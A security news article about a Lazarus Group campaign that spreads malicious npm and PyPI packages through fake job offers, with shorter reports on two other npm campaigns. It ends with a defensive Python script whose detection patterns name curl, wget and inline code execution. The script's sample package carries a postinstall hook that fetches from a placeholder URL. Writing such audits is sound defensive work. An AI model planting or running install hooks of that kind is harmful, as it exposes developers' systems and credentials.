Lazarus Group Infects npm and PyPI Ecosystems with Malicious Packages via Fake Job Campaign
#Security

Security Reporter

North Korea-linked Lazarus Group is targeting developers with malicious npm and PyPI packages through fake blockchain job offers, deploying remote access trojans to steal cryptocurrency wallets and sensitive data.

Cybersecurity researchers have uncovered a sophisticated campaign by the North Korea-linked Lazarus Group that planted over 30 malicious packages across npm and PyPI repositories. Dubbed "graphalgo" after its initial npm package, this operation leverages fake blockchain job offers to trick developers into installing malware-laden dependencies.

Recruitment as Attack Vector

According to ReversingLabs researcher Karlo Zanki, attackers approach developers through LinkedIn, Facebook, and job forums like Reddit: "Developers are approached via social platforms... with a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges." The threat actors establish fake companies like Veltrix Capital, complete with professional-looking domains and GitHub organizations hosting seemingly legitimate coding assessment repositories.

The malicious packages—including bigmathutils (npm) and bigmathix (PyPI)—contain hidden payloads that activate when developers run coding tests. One npm package attracted over 10,000 downloads before its malicious version was deployed. When executed, these packages deploy a remote access trojan (RAT) that:

  • Gathers system information and file directories
  • Steals cryptocurrency wallet data (including MetaMask extensions)
  • Exfiltrates credentials via encrypted C2 channels
  • Supports file manipulation commands (upload/download/delete)

Sophisticated Tradecraft

Notably, the RAT uses a token-based authentication system previously seen in Jade Sleet campaigns. As Zanki explained: "The token-based approach... has not been used by other actors in malware hosted on public package repositories." Infected systems first register with the C2 server, receiving a token that must accompany all subsequent communications—a technique that filters out security researchers' probes.

This campaign demonstrates exceptional patience, with attackers spending months building fake company profiles and relationships before deploying malicious payloads. ReversingLabs notes: "Its modularity, long-lived nature, and complexity of the multilayered malware point to a state-sponsored threat actor."

Broader Ecosystem Threats

Simultaneously, JFrog discovered duer-js—a malicious npm package posing as a console utility that actually distributes Bada Stealer. This Windows malware harvests:

  • Discord tokens and browser passwords
  • Cryptocurrency wallet data
  • Payment methods via Discord client hijacking

Another campaign dubbed XPACK ATTACK abuses npm's installation process to extort payments. As OpenSourceMalware researcher Paul McCarty detailed: "The attack blocks installation until victims pay 0.1 USDC/ETH... while collecting GitHub usernames and device fingerprints." It exploits HTTP status code 402 ("Payment Required") to create fake paywalls.

Protection Strategies

For developers and organizations:

  1. Verify job offers: Research companies offering coding tests, especially in blockchain/crypto sectors
  2. Audit dependencies: Use tools like npm audit and PyPI's security features before installation
  3. Sandbox assessments: Run coding tests in isolated environments
  4. Monitor network traffic: Detect anomalous connections to unknown C2 servers
  5. Implement supply chain security: Use SCA tools to flag suspicious package behavior
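As an added example (not code from the ReversingLabs or JFrog research, nor from any package named above), the following Python script audits an npm package.json for lifecycle scripts that run automatically during `npm install`, the step these campaigns abuse, and flags commands worth reviewing in a sandbox before installing; the package name and the postinstall command are constructed sample data.

```python
import json
import re

# Lifecycle hooks that npm executes on its own during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that, inside an install hook, warrant manual review.
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b", "downloads remote content"),
    (r"\bnode\s+-e\b", "runs inline JavaScript"),
    (r"base64|Buffer\.from\(", "decodes embedded data"),
    (r"https?://", "contacts a URL"),
]


def audit_package_json(text):
    """Return (hook, reason) findings for install-time scripts in one package.json."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # e.g. "test" or "build" only run when invoked explicitly
        findings.append((hook, "lifecycle script runs on install"))
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append((hook, why))
    return findings


# Constructed sample: a package whose postinstall hook pulls code from a URL.
SAMPLE = json.dumps({
    "name": "example-utils",  # placeholder name, not a real package
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('https').get('https://example.invalid/x')\"",
    },
})

if __name__ == "__main__":
    for hook, reason in audit_package_json(SAMPLE):
        print(f"{hook}: {reason}")
```

Running the audit before every install, or installing with `npm install --ignore-scripts` and enabling hooks only for packages you have reviewed, keeps a coding-assessment repository's dependencies from executing code on your workstation unnoticed.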

These incidents highlight how open-source ecosystems remain prime targets for advanced threat actors. As Zanki warns: "Developers must treat unsolicited job offers requiring code execution as potential attack vectors."
